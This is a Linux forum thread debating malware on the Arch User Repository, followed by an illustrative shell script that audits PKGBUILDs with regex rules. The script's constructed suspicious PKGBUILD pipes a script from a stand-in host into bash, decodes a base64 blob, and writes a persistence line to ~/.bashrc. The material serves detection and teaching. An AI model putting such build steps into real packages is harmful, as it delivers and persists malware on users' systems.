this post was submitted on 01 Aug 2025
84 points (93.8% liked)
Linux
A community for everything relating to the GNU/Linux operating system (except the memes!)
That's why you shouldn't blindly trust AUR, and always review the scripts before installing.
But something needs to change:
This won't stop here; more malware packages will appear. Arch, and Linux in general, is getting more users and becoming a target: not only the Arch Linux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge of what they do.
2025 is the year of malware on Linux
Why does anything need to change? The AUR is functioning as intended: a low-friction system for users to provide packages outside of the official repositories. This has always been a possible consequence of not reviewing the PKGBUILD. I don't see why everything needs guardrails; some things have sharp edges, handle with care!

Given how often the 'btw' spammers evangelize how they learned soooo much about Linux and their 'minimal system' because they managed to format a disk manually and chroot, not installing malware from an untrusted source ought to be a no-brainer. Even if you solved this particular problem, the same people will be just a curl | sh away from pwning themselves. Should we start requiring forced auth to pipe?

The maintainers are welcome to do whatever they like, but it would be nice to have at least a few places where we don't cater to the lowest common denominator and still RTFM.
Just the case of the packages being removed only a few hours after being published makes my point about "trusted users" reviewing and reporting them.
And it's not only an Arch Linux/AUR problem; the same happens with Python pip, npm, Docker Hub, GitHub... The bigger the popularity, the bigger the target.
These days, after the success of the Steam Deck, many users switched to Linux, and many of those started using Arch or Arch-based distros like EndeavourOS because someone on Reddit, YouTube or elsewhere said it is the best for new hardware and you can find everything you need on the AUR.
New users won't review scripts or PKGBUILDs; that's gibberish. They just search and install, and a few hours could be too late for some.
I don't care if Linux loses or gains popularity, but if there are no guardrails or some kind of control, things could get worse, and could even end the AUR as it is now.
Having people control what's published or not is probably not the best solution, but leaving it as a wild west isn't either.
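As an added illustration of the advice running through this thread ("review the PKGBUILD before installing", and the "curl | sh" point in the reply above), here is a small POSIX shell audit script. It is example code written for this page, not code from the AUR, makepkg, any AUR helper, or any of the commenters. The rule set and both sample PKGBUILDs are constructed for the demo (the `example.invalid` domain is reserved and does not resolve); every rule is a heuristic that says "read this line carefully", not "this is malware", and zero findings is not a clean bill of health.

```sh
#!/bin/sh
# Heuristic PKGBUILD audit, written for this page as an illustration of
# "read the PKGBUILD before you build it". Not part of makepkg or the AUR.
# A hit means "read this line carefully", not "malware"; zero hits only
# means none of the lazy tricks below were used.

# Rules, one per line: extended-regex;explanation (constructed rule set).
# Comment lines in the PKGBUILD are skipped when matching.
pkgbuild_rules() {
    cat <<'EOF'
(^|[^[:alnum:]_])(curl|wget)[[:space:]];network fetch at build time, outside source=(), so makepkg cannot checksum it
\|[[:space:]]*(ba|z)?sh([[:space:]]|$);pipes command output straight into a shell
base64[[:space:]]+(-d|--decode);decodes an embedded base64 blob (obfuscated payload?)
(^|[^[:alnum:]_])eval[[:space:]];eval of a constructed string
(^|[^[:alnum:]_])(sudo|doas)[[:space:]];privilege escalation, which makepkg never needs
systemctl[[:space:]]+(enable|start)|crontab[[:space:]]+-|\.bashrc|\.profile|\.xinitrc;touches persistence locations instead of installing files under $pkgdir
/home/|\$HOME|~/;writes outside $srcdir and $pkgdir
EOF
}

# Print one line per finding: file:line:content  [why]
audit_pkgbuild() {
    file="$1"
    pkgbuild_rules | while IFS=';' read -r pat why; do
        [ -n "$pat" ] || continue
        grep -nE "$pat" "$file" | grep -vE '^[0-9]+:[[:space:]]*#' \
            | while IFS= read -r line; do
                printf '%s:%s  [%s]\n' "$file" "$line" "$why"
            done
    done
    # 'SKIP' in the checksum array is normal only for VCS sources (git+https://...);
    # for a plain tarball it means nothing about the download is verified.
    if grep -qE "(^|[('[:space:]])SKIP([)'[:space:]]|\$)" "$file" \
        && ! grep -qE '(git|svn|hg|bzr|fossil)\+' "$file"; then
        printf '%s: checksum SKIP with no VCS source  [tarball contents are unverified]\n' "$file"
    fi
}

# Number of findings, for scripting (0 = nothing flagged).
count_findings() {
    audit_pkgbuild "$1" | wc -l | tr -d ' '
}

# Constructed sample: a tarball package that phones home and persists.
sample_bad_pkgbuild() {
    cat <<'EOF'
# Maintainer: Example Person <example@example.invalid>
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
pkgdesc="Example tool (constructed for this audit demo)"
arch=('x86_64')
depends=('curl')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  curl -fsSL https://example.invalid/setup.sh | bash
  echo 'aGVsbG8K' | base64 -d > helper
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  echo 'helper &' >> ~/.bashrc
}
EOF
}

# Constructed sample: an ordinary -git package where SKIP is expected.
sample_good_pkgbuild() {
    cat <<'EOF'
# Maintainer: Example Person <example@example.invalid>
pkgname=example-tool-git
pkgver=1.2.3
pkgrel=1
pkgdesc="Example tool, VCS build (constructed for this audit demo)"
arch=('x86_64')
makedepends=('git')
source=("git+https://example.invalid/example-tool.git")
sha256sums=('SKIP')

build() {
  cd "$srcdir/example-tool"
  make
}

package() {
  cd "$srcdir/example-tool"
  make DESTDIR="$pkgdir" install
  install -Dm644 example-tool.service "$pkgdir/usr/lib/systemd/system/example-tool.service"
}
EOF
}

# Demo: audit both samples.
bad=$(mktemp); good=$(mktemp)
sample_bad_pkgbuild > "$bad"
sample_good_pkgbuild > "$good"
echo "== suspicious sample =="; audit_pkgbuild "$bad"
echo "== VCS sample: $(count_findings "$good") findings =="
rm -f "$bad" "$good"
```

On the suspicious sample the script flags the curl line twice (network fetch, and piping into a shell), the base64 decode, the `~/.bashrc` write twice (persistence location, and outside `$pkgdir`), and the `SKIP` checksum on a non-VCS source; the -git sample produces no findings because `SKIP` is the normal value for a `git+` source. To use it on a real AUR package, clone the package repository, run `audit_pkgbuild PKGBUILD`, and then still read the file: the rules only catch obvious patterns, and a determined author can hide the same behaviour in a patch file, a build script inside the source tarball, or a `.install` script, none of which this example inspects.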